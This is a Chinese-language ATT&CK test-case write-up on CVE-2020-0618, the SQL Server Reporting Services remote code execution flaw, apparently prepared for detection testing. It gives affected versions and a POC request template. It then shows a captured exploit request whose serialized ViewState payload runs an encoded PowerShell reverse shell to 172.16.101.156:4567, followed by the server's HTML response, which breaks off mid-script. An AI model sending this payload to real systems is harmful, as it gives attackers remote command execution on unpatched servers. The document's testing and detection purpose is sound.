T1190-CVE-2020-0618-SQL_server远程代码执行漏洞
来自ATT&CK的描述
使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。
如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。
对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。
测试案例
SQL Server Reporting Services是依托于SQL Server的一个附属组件。其作用是利用SQL Server 中的数据,便捷的生成用户友好的图表。该服务默认是内部服务,默认开放在localhost的80端口。
该漏洞需要经过身份验证后,攻击者向SQL Server 的报告服务(Reporting Services) 发送特制请求进行触发。攻击成功可获得SQL Server服务的对应控制权限。
影响范围:
SQL Server 2016 Service Pack 2(GDR) 13.0.5026.0 - 13.0.5101.9 KB4505220
SQL Server 2016 Service Pack 2 CU11 13.0.5149.0 - 13.0.5598.27 KB4527378
SQL Server 2014 Service Pack 3 (GDR) 12.0.6024.0 - 12.0.6108.1 KB4505218
Server 2014 Service Pack 2 CU4 12.0.6205.1 - 12.0.6329.1 KB4500181
SQL Server 2012 Service Pack 4 (QFE) 111.0.7001.0 - 11.0.7462.6 KB4057116
检测日志
HTTP
测试复现
利用POC
POST /ReportServer/pages/ReportViewer.aspx HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Content-Length: X
NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PayloadHere]&__VIEWSTATE=
测试留痕
POST /ReportServer/pages/ReportViewer.aspx HTTP/1.1
Host: 10.16.45.164:43452
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4931
Authorization: NTLM TlRMTVNTUAADAAAAGAAYAHIAAADQANAAigAAAAAAAABYAAAAGgAaAFgAAAAAAAAAcgAAABAAEABaAQAANYKK4gYBsR0AAAAPZbeJ4F7Hurhq3KRbofjXh0EAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZNI4oLUbq8WOw+I6xP4TBQEBAAAAAAAAPxs79Pus1gEZGK1/9HV2LQAAAAACAB4AVwBJAE4ALQBBAEkAVQBDAE8AVQBLAEkAUQA1AEEAAQAeAFcASQBOAC0AQQBJAFUAQwBPAFUASwBJAFEANQBBAAQAHgBXAEkATgAtAEEASQBVAEMATwBVAEsASQBRADUAQQADAB4AVwBJAE4ALQBBAEkAVQBDAE8AVQBLAEkAUQA1AEEABwAIAD8bO/T7rNYBBgAEAAIAAAAAAAAAAAAAAPpOCRDGkg49ccL4zPkP3QI=
__VIEWSTATE=&NavigationCorrector%24PageState=NeedsCorrection&NavigationCorrector%24ViewState=%2FwEynBwAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAA4govYyBwb3dlcnNoZWxsLmV4ZSAtZW5jb2RlZENvbW1hbmQgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQTNBRElBTGdBeEFEWUFMZ0F4QURBQU1RQXVBREVBTlFBMkFDSUFMQUEwQURVQU5nQTNBQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQ0FBUFFBZ0FDUUFZd0JzQUdrQVpRQnVBSFFBTGdCSEFHVUFkQUJUQUhRQWNnQmxBR0VBYlFBb0FDa0FPd0JiQUdJQWVRQjBBR1VBV3dCZEFGMEFKQUJpQUhrQWRBQmxBSE1BSUFBOUFDQUFNQUF1QUM0QU5nQTFBRFVBTXdBMUFId0FKUUI3QURBQWZRQTdBSGNBYUFCcEFHd0FaUUFvQUNnQUpBQnBBQ0FBUFFBZ0FDUUFjd0IwQUhJQVpRQmhBRzBBTGdCU0FHVUFZUUJrQUNnQUpBQmlBSGtBZEFCbEFITUFMQUFnQURBQUxBQWdBQ1FBWWdCNUFIUUFaUUJ6QUM0QVRBQmxBRzRBWndCMEFHZ0FLUUFwQUNBQUxRQnVBR1VBSUFBd0FDa0Fld0E3QUNRQVpBQmhBSFFBWVFBZ0FEMEFJQUFvQUU0QVpRQjNBQzBBVHdCaUFHb0FaUUJqQUhRQUlBQXRBRlFBZVFCd0FHVUFUZ0JoQUcwQVpRQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVZBQmxBSGdBZEFBdUFFRUFVd0JEQUVrQVNRQkZBRzRBWXdCdkFHUUFhUUJ1QUdjQUtRQXVBRWNBWlFCMEFGTUFkQUJ5QUdrQWJnQm5BQ2dBSkFCaUFIa0FkQUJsQUhNQUxBQXdBQ3dBSUFBa0FHa0FLUUE3QUNRQWN3QmxBRzRBWkFCaUFHRUFZd0JyQUNBQVBRQWdBQ2dBYVFCbEFIZ0FJQUFrQUdRQVlRQjBBR0VBSUFBeUFENEFKZ0F4QUNBQWZBQWdBRThBZFFCMEFDMEFVd0IwQUhJQWFRQnVBR2NBSUFBcEFEc0FKQUJ6QUdVQWJnQmtBR0lBWVFCakFHc0FNZ0FnQUNBQVBRQWtBSE1BWlFCdUFHUUFZZ0JoQUdNQWF3QWdBQ3NBSUFBaUFGQUFVd0FnQUNJQUlBQXJBQ0FBS0FCd0FIY0FaQUFwQUM0QVVBQmhBSFFBYUFBZ0FDc0FJQUFpQUQ0QUlBQWlBRHNBSkFCekFHVUFiZ0JrQUdJQWVRQjBBR1VBSUFBOUFDQUFLQUJiQUhRQVpRQjRBSFFBTGdCbEFHNEFZd0J2QUdRQWFRQnVBR2NBWFFBNkFEb0FRUUJUQUVNQVNRQkpBQ2tBTGdCSEFHVUFkQUJDQUhrQWRBQmxBSE1BS0FBa0FITUFaUUJ1QUdRQVlnQmhBR01BYXdBeUFDa0FPd0FrQUhNQWRBQnlBR1VBWVFCdEFDNEFWd0J5QUdrQWRBQmxBQ2dBSkFCekFHVUFiZ0JrQUdJQWVRQjBBR1VBTEFBd0FDd0FKQUJ6QUdVQWJnQmtBR0lBZVFCMEFHVUFMZ0JNQUdVQWJnQm5BSFFBYUFBcEFEc0FKQUJ6QUhRQWNnQmxBR0VBYlFBdUFFWUFiQUIxQUhNQWFBQW9BQ2tBZlFBN0FDUUFZd0JzQUdrQVpRQnVBSFFBTGdCREFHd0Fid0J6QUdVQUtBQXBBQT09BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA%2BU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs%3DHTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21744
Content-Type: text/html; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-AspNet-Version: 4.0.30319
X-Content-Type-Options: nosniff
Date: Wed, 28 Oct 2020 07:28:38 GMT
<!DOCTYPE html>
<html>
<head id="headID" lang="zh-CN">
<meta charset="utf-8">
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=edge">
<title>
- ...............
</title><link href="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.Html5Toolbar.css" rel="stylesheet" type="text/css" /><link href="/ReportServer/Reserved.ReportServer?rs:command=StyleSheet&Name=&Version=2015.130.1601.05" rel="stylesheet" type="text/css" /><link href="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.jqueryui.min.css" rel="stylesheet" type="text/css" /><link href="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.Html5Renderer.css" rel="stylesheet" type="text/css" /><script language="Javascript" type="text/Javascript" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.jquery.min.js"></script><script language="Javascript" type="text/Javascript" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.jqueryui.min.js"></script><script language="Javascript" type="text/Javascript" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.knockoutjs.js"></script><script language="Javascript" type="text/Javascript" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.Html5Renderer.js"></script><script language="Javascript" type="text/Javascript" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.Reporting.WebForms.Scripts.RSTelemetry.js"></script><script type="text/javascript">
var RS;
var RSTelemetry;
if (RS && RS.Telemetry) {
try {
RSTelemetry = new RS.Telemetry({"Build":"13.0.1601.5","Host":"ReportingServicesWebServer","HashedInstanceId":"5C5FFF2BBFEF6D664EAD5BF70842D094353A8832B3179992C5EC4DDE2184CABF","HashedUserId":"C84D026B4E5BB8F628490233444855EAD9537B0524EBE4BDD0243123612BE5AA","ExternalUser":"True","Edition":"Enterprise"}, "/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.ReportingServices.Rendering.HtmlRenderer.RendererResources.application-insights.js");
RSTelemetry.trackPageView({ url: "ReportViewer.aspx" });
} catch (exception) {
}
}
</script><script type="text/javascript">
var RSTelemetry;
if (RSTelemetry) {
RSTelemetry.trackEvent("RS.ReportViewer.Render", {"TargetingHtml40":"False","ItemPath":"8A5EDAB282632443219E051E4ADE2D1D5BBC671C781051BF1437897CBDFEA0F1","UserAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"});
}
</script></head>
<body style="margin: 0px; overflow: auto">
<form method="post" action="./ReportViewer.aspx" id="ReportViewerForm" style="width:100%;height:100%">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE0NjY0NTA2NjMPZBYGZg8WAh4EVGV4dAUQPCFET0NUWVBFIGh0bWw+CmQCAg8WAh4EbGFuZwUFemgtQ04WAgIBDxYCHwAFOAoJPE1FVEEgSFRUUC1FUVVJVj0iWC1VQS1Db21wYXRpYmxlIiBDT05URU5UPSJJRT1lZGdlIj4KZAIED2QWBAIED2QWBAIBDxYCHgVWYWx1ZWRkAgMPZBYCZg9kFgJmDxYCHwJkZAIFDxQrAAVkKClYU3lzdGVtLkd1aWQsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSQzY2FkYjE3NS1iZWRiLTQwYWItODBjMy0yZmRlNTUyN2RjZGQCARQrAAEUKwAEZhQrAAJkAgFkZGQWAgIBD2QWAmYPZBYCZg9kFgwCAQ8PFgIeB1Zpc2libGVoZGQCAg9kFgICAg8WAh8CBQVmYWxzZWQCAw8PFgIfA2hkZAIFD2QWAgICDxYCHwIFBWZhbHNlZAIGD2QWAmYPZBYCZg9kFgRmDw9kFgIeBXN0eWxlBRB2aXNpYmlsaXR5Om5vbmU7ZAIDD2QWBAIBDxYCHgdFbmFibGVkaGQCBA8WAh8CBQMxMDBkAgoPZBYCAgEPFgIfAgUFRmFsc2VkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBSNSZXBvcnRWaWV3ZXJDb250cm9sJFRvZ2dsZVBhcmFtJGltZwUdUmVwb3J0Vmlld2VyQ29udHJvbCRjdGwwNyRpbWf0vpO0oY4wb+zjEX8982bcJ0/OsD0dzgB1cDESwU5y3w==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ReportViewerForm'];
if (!theForm) {
theForm = document.ReportViewerForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/ReportServer/WebResource.axd?d=Ov5TcDlIR4L3uboQTuCmOyzxZlFI87EVwA8MTt0A8wTF67-wLOBXf-8BRssABM-acy292vdKTSgkV9AebwBl1lMooRPgDOJ7xMleOnFfqS41&t=636043007952281841" type="text/javascript"></script>
<script src="/ReportServer/ScriptResource.axd?d=I-YMT-mFNzdk-lCC39WuU9DeqZWRtuKQhzp4BRmLR47qjd2cjJtu59tIr0QetErd6BK3J4s-w9e0_iHIIKtjQ7HyYZ5JPJhvyDPNiWa_ojbiQhLerZKO6_eaob_GIbUcv2hSZtJVQ8hws-pLFl1qo6yuo2K0k6_p6haC3fYd84zBeXNAeLHulYhWjz230GnN0&t=ffffffffc7ae6e38" type="text/javascript"></script>
<script src="/ReportServer/ScriptResource.axd?d=-Cdg2drN8Wy0xDKU0zwdQbsz0D8_dUbhvptrtPeLypB8J2b1rs47vWm0XPULZy1WnoFJ8h2SYnx5hySyh_w8BXo1ye0Ebu86eSnEcuuY3ZRnFhwIRGIxSZR0In84SuPhbW6_Ai6pvfl8zKkPNoFEsI2gIBfE9jB4NW4u58FyHv1ABwh8yUZX38IAAqNX3n3t0&t=ffffffffc7ae6e38" type="text/javascript"></script>
<script src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=ViewerScript" type="text/javascript"></script>
<script src="/ReportServer/ScriptResource.axd?d=ILslaHEYwalu15zdv7Bw8t2xYgV30NzsfTAa0lR6jzGvfbtZy1Z_ffLoGlxI9bthCmRSJMegwrsYaUzHJbhlmlPLLuKr-v-MIHrzz9nSzIXUB0R_eI8VMcYyFNyZD_Wmr_UuVgS21fFlrBSnhF0IDKBnqgNVzdTxcV-oltrq3u01&t=ffffffffc7ae6e38" type="text/javascript"></script>
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="177045DE" />
</div>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('AjaxScriptManager', 'ReportViewerForm', ['tNavigationCorrector$ctl00','NavigationCorrector_ctl00','fReportViewerControl$ReportViewer','','fReportViewerControl$DocMap','','fReportViewerControl$ctl09$ReportArea',''], ['NavigationCorrector','NavigationCorrector'], ['ReportViewerControl$ctl09$ReportControl$ctl00',''], 0, '');
//]]>
</script>
<table cellspacing="0" cellpadding="0" width="100%" height="100%"><tr height="100%"><td width="100%">
<span><span id="ctl01_ctl00" style="display:none;"></span><script>
$addHandler(window, 'beforeunload', function() {Sys.WebForms.PageRequestManager.getInstance().abortPostBack();});
Sys.WebForms.PageRequestManager.getInstance().add_endRequest(function(sender, args) {
if (args.get_error() !== null) {
var label = $get('ctl01_ctl00');
label.style.display = '';
label.innerText = args.get_error().message;
label.textContent = label.innerText;
}
});
Sys.WebForms.PageRequestManager.getInstance().add_beginRequest(function(sender, args) {$get('ctl01_ctl00').style.display = 'none';});
</script></span><div id="NavigationCorrector" style="display:none;">
<input type="hidden" name="NavigationCorrector$ScrollPosition" id="NavigationCorrector_ScrollPosition" /><input type="hidden" name="NavigationCorrector$ViewState" id="NavigationCorrector_ViewState" /><input type="hidden" name="NavigationCorrector$PageState" id="NavigationCorrector_PageState" value="NeedsCorrection" /><div id="NavigationCorrector_ctl00">
<input type="hidden" name="NavigationCorrector$NewViewState" id="NavigationCorrector_NewViewState" />
</div>
</div><noscript>
............................................................................................................ <a href="/ReportServer?&rs:Command=Render&rs:Format=HTML5&rc:LinkTarget=_top&rc:Javascript=false&rc:Toolbar=false">......</a>
</noscript><div id="ReportViewerControl_ReportViewer">
<div id="ReportViewerControl" onclick="if ($get('ReportViewerControl_ctl04') != null && $get('ReportViewerControl_ctl04').control != null) $get('ReportViewerControl_ctl04').control.HideActiveDropDown();" onactivate="if ($get('ReportViewerControl_ctl04') != null && $get('ReportViewerControl_ctl04').control != null) $get('ReportViewerControl_ctl04').control.HideActiveDropDown();" style="height:100%;width:100%;">
<div id="ReportViewerControl_HttpHandlerMissingErrorMessage" style="border-color:Red;border-width:2px;border-style:Solid;padding:10px;display:none;overflow:auto;font-size:.85em;">
<h2>
...........................
</h2><p>.................. Web ...... HTTP .................................... web.config ........................ <add verb="*" path="Reserved.ReportViewerWebControl.axd" type = "Microsoft.Reporting.WebForms.HttpHandler, ReportingServicesWebServer, Version=13.0.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91" /> ......... web.config ......... system.web/httpHandlers ............... Internet Information Services 7 ........................ <add name="ReportViewerWebControlHandler" preCondition="integratedMode" verb="*" path="Reserved.ReportViewerWebControl.axd" type="Microsoft.Reporting.WebForms.HttpHandler, ReportingServicesWebServer, Version=13.0.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91" /> ......... system.webServer/handlers .........</p>
</div><span id="ReportViewerControl_ctl03"><input type="hidden" name="ReportViewerControl$ctl03$ctl00" id="ReportViewerControl_ctl03_ctl00" /><input type="hidden" name="ReportViewerControl$ctl03$ctl01" id="ReportViewerControl_ctl03_ctl01" /></span><input type="hidden" name="ReportViewerControl$ctl10" id="ReportViewerControl_ctl10" /><input type="hidden" name="ReportViewerControl$ctl11" id="ReportViewerControl_ctl11" /><div id="ReportViewerControl_AsyncWait" style="background-color:White;opacity:0.7;position:absolute;display:none;filter:alpha(opacity=70);">
</div><div id="ReportViewerControl_AsyncWait_Wait" class="WaitControlBackground" style="display:none;position:absolute;">
<table height="100%">
<tr>
<td width="32px" height="32px"><img src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.Reporting.WebForms.Icons.SpinningWheel.gif" alt="..............." style="height:32px;width:32px;" /></td><td class="WaitInfoCell"><span class="WaitText">...............</span><div class="CancelLinkDiv">
<a class="CancelLinkText" href="javascript:$get('ReportViewerControl_AsyncWait').control._cancelCurrentPostback();">......</a>
</div></td>
</tr>
</table>
</div><input type="hidden" name="ReportViewerControl$AsyncWait$HiddenCancelField" id="ReportViewerControl_AsyncWait_HiddenCancelField" value="False" /><table cellpadding="0" cellspacing="0" id="ReportViewerControl_fixedTable" style="table-layout:fixed;width:100%;height:100%;">
<tr>
<td style="display:none;width:25%;"></td><td style="display:none;width:6px;"></td><td style="width:100%;"></td>
</tr><tr id="ParametersRowReportViewerControl" style="display:none;">
<td colspan="3"></td>
</tr><tr style="height:6px;font-size:2pt;display:none;">
<td colspan="3" class="SplitterNormal" style="padding:0px;margin:0px;text-align:center;"><div id="ReportViewerControl_ToggleParam">
<input type="image" name="ReportViewerControl$ToggleParam$img" id="ReportViewerControl_ToggleParam_img" title="............" aria-live="polite" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.Reporting.WebForms.Icons.SplitterHorizCollapse.png" alt="............" align="middle" onclick="void(0);" style="cursor:pointer;" /><input type="hidden" name="ReportViewerControl$ToggleParam$store" id="ReportViewerControl_ToggleParam_store" /><input type="hidden" name="ReportViewerControl$ToggleParam$collapse" id="ReportViewerControl_ToggleParam_collapse" value="false" />
</div></td>
</tr><tr style="display:none;">
</tr><tr>
<td style="vertical-align:top;width:25%;height:100%;display:none;"><div style="width:100%;height:100%;">
<div id="ReportViewerControl_DocMap">
<div id="ReportViewerControl_ctl08" style="display:none;">
<input type="hidden" name="ReportViewerControl$ctl08$ClientClickedId" id="ReportViewerControl_ctl08_ClientClickedId" />
</div>
</div>
</div></td><td class="SplitterNormal" style="display:none;width:4px;padding:0px;margin:0px;height:100%;vertical-align:middle;"><div id="ReportViewerControl_ctl07">
<input type="image" name="ReportViewerControl$ctl07$img" id="ReportViewerControl_ctl07_img" title="....................." aria-live="polite" src="/ReportServer/Reserved.ReportViewerWebControl.axd?OpType=Resource&Version=13.0.1601.5&Name=Microsoft.Reporting.WebForms.Icons.SplitterVertCollapse.png" alt="....................." align="top" onclick="void(0);" style="cursor:pointer;" /><input type="hidden" name="ReportViewerControl$ctl07$store" id="ReportViewerControl_ctl07_store" /><input type="hidden" name="ReportViewerControl$ctl07$collapse" id="ReportViewerControl_ctl07_collapse" value="false" />
</div></td><td style="height:100%;vertical-align:top;"><div id="ReportViewerControl_ctl09" style="width:100%;overflow:auto;position:relative;">
<div id="VisibleReportContentReportViewerControl_ctl09" role="main" style="display:none;">
</div><div id="ReportViewerControl_ctl09_ReportArea">
<div NewContentType="ReportingServices.WebFormsClient.ReportAreaContent.None" ForNonReportContentArea="false" id="ReportViewerControl_ctl09_VisibilityState" style="visibility:none;">
<input type="hidden" name="ReportViewerControl$ctl09$VisibilityState$ctl00" value="None" />
</div><input type="hidden" name="ReportViewerControl$ctl09$ScrollPosition" id="ReportViewerControl_ctl09_ScrollPosition" /><span id="ReportViewerControl_ctl09_Reserved_AsyncLoadTarget"></span><div id="ReportViewerControl_ctl09_ReportControl" style="display:none;">
<span></span><input type="hidden" name="ReportViewerControl$ctl09$ReportControl$ctl02" /><input type="hidden" name="ReportViewerControl$ctl09$ReportControl$ctl03" /><input type="hidden" name="ReportViewerControl$ctl09$ReportControl$ctl04" id="ReportViewerControl_ctl09_ReportControl_ctl04" value="100" />
</div><div id="ReportViewerControl_ctl09_NonReportContent" style="height:100%;width:100%;">
</div>
</div>
</div></td>
</tr>
</table>
</div>
</div>
</td></tr></table>
<script type="text/javascript">
//<![CDATA[
Sys.Application.add_init(function() {
if (
typeof ReportingServices == 'undefined' ||
typeof ReportingServices.WebFormsClient == 'undefined' ||
typeof ReportingServices.WebFormsClient.ReportViewer == 'undefined')
Sys.UI.DomElement.setVisible($get('ReportViewerControl_HttpHandlerMissingErrorMessage'), true);
$create(ReportingServices.WebFormsClient.ReportViewer, {"_internalViewerId":"ReportViewerControl_ctl03","id":"ReportViewerControl"}, null, null);
});
Sys.Application.add_init(function() {
$create(ReportingServices.WebFormsClient._InternalReportViewer, {"ActionParamId":"ReportViewerControl_ctl03_ctl01","ActionTypeId":"ReportViewerControl_ctl03_ctl00","BaseHeight":"100%","BaseWidth":"100%","BrowserModeId":"ReportViewerControl_ctl11","DirectionCacheId":"ReportViewerControl_ctl10","DocMapAreaId":"ReportViewerControl_ctl08","DocMapHeaderOverflowDivId":"ReportViewerControl_ctl08DocMapHeaderOverflowDiv","DocMapSplitterId":"ReportViewerControl_ctl07","DocMapUpdatePanelId":"ReportViewerControl_DocMap","FixedTableId":"ReportViewerControl_fixedTable","HasSizingRow":true,"PostBackToClientScript":function(){__doPostBack('ReportViewerControl$ctl03','');},"PromptAreaRowId":"ParametersRowReportViewerControl","PromptSplitterId":"ReportViewerControl_ToggleParam","ReportAreaId":"ReportViewerControl_ctl09","ReportViewerId":"ReportViewerControl","TopLevelUpdatePanelId":"ReportViewerControl_ReportViewer"}, null, null, $get("ReportViewerControl_ctl03"));
});
Sys.Application.add_init(function() {
